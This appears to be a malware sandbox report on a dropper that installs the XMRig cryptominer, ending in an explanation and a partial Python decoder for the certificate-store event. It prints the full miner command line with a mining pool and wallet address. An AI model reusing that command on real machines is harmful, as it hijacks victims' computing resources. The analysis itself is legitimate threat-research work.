memory/4056-77-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-78-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-79-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-80-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-81-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-82-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-83-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-84-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56
bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1596 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1596 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2940-16-0x0000013EF2A10000-0x0000013EF2A30000-memory.dmp
memory/2940-17-0x0000013F84DC0000-0x0000013F84DE0000-memory.dmp
memory/2940-18-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-19-0x0000013F85200000-0x0000013F85220000-memory.dmp
memory/2940-20-0x0000013F85430000-0x0000013F85450000-memory.dmp
memory/2940-21-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-22-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-25-0x0000013F85430000-0x0000013F85450000-memory.dmp
memory/2940-24-0x0000013F85200000-0x0000013F85220000-memory.dmp
memory/2940-23-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-26-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-27-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-28-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-29-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-30-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-31-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-32-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-33-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-34-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-35-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-36-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-37-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-38-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-39-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-40-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-41-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-42-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-43-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-44-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-45-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-46-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-47-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-48-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-49-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-50-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-51-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-52-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-53-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-54-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-55-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-56-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-57-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-58-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-59-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-60-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-61-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-62-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-63-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-64-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-65-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-66-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-67-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-68-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-69-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-70-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-71-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-72-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-73-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-74-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-75-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-76-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-77-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-78-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-79-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-80-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-81-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-82-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-83-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-84-0x00007FF758640000-0x00007FF759143000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:30
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef
4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1460 wrote to memory of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1460 wrote to memory of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1428-16-0x00000233230B0000-0x00000233230D0000-memory.dmp
memory/1428-17-0x0000023323120000-0x0000023323140000-memory.dmp
memory/1428-18-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-20-0x0000023323160000-0x0000023323180000-memory.dmp
memory/1428-19-0x0000023323140000-0x0000023323160000-memory.dmp
memory/1428-21-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-22-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-25-0x0000023323160000-0x0000023323180000-memory.dmp
memory/1428-24-0x0000023323140000-0x0000023323160000-memory.dmp
memory/1428-23-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-26-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-27-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-28-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-29-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-30-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-31-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-32-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-33-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-34-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-35-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-36-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-37-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-38-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-39-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-40-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-41-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-42-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-43-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-44-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-45-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-46-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-47-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-48-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-49-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-50-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-51-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-52-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-53-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-54-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-55-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-56-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-57-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-58-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-59-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-60-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-61-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-62-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-63-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-64-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-65-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-66-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-67-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-68-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-69-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-70-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-71-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-72-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-73-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-74-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-75-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-76-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-77-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-78-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-79-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-80-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-81-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-82-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-83-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-84-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:32
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
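Before treating this signature as tampering, decode what was written. The Blob value logged in full in the behavioral15 and behavioral17 runs above is a sequence of CryptoAPI property records for one certificate: its SHA-1 thumbprint d1eb23a46d17d68fd92564c2f1f1601764d8e349 (the same value as the registry key name), the subject key identifier a0110a233e96f107ece2af29ef82a57fd030a4b4, the UTF-16 friendly name "Sectigo (AAA)", and finally the DER certificate itself, whose subject decodes to C=GB, O=Comodo CA Limited, CN=AAA Certificate Services, valid 2004-01-01 to 2028-12-31. That is a publicly trusted root, and AuthRoot is the store that Windows' automatic root update fills when a process builds a chain to a root that is not cached locally yet; here the dropper had just fetched the miner over HTTPS from github.com and objects.githubusercontent.com, so the event is consistent with that mechanism rather than with a rogue root being planted. The check worth automating is structural: does the key name equal the stored SHA-1 and the SHA-1 of the stored certificate, and is the thumbprint one the Microsoft root program publishes (the second needs a CTL lookup and is not done here). The parser below is an added example written for this page, not code from the sandbox or from any tool it names; it embeds the first five records of the logged Blob (hex copied from the event) plus a constructed stand-in certificate, and the property names follow wincrypt.h.

```python
"""Decode a CryptoAPI certificate Blob of the kind this report logs under
HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\<SHA-1>\\Blob.
Each record is DWORD propid, DWORD reserved (always 1), DWORD cb, then cb data bytes."""
from __future__ import annotations

import hashlib
import struct

# CERT_*_PROP_ID values from wincrypt.h for the records present in the logged blob.
PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID",
    0x0B: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0F: "CERT_SIGNATURE_HASH_PROP_ID",
    0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x19: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    0x1D: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    0x20: "CERT_CERT_PROP_ID",
    0x53: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    0x62: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}

# First five records of the Blob recorded in this report (hex copied from the registry
# event): public-key MD5, SHA-1 thumbprint, subject-name MD5, key identifier, friendly
# name. The EKU, policy, SHA-256 and DER certificate records are left out.
REPORT_KEY_NAME = "D1EB23A46D17D68FD92564C2F1F1601764D8E349"
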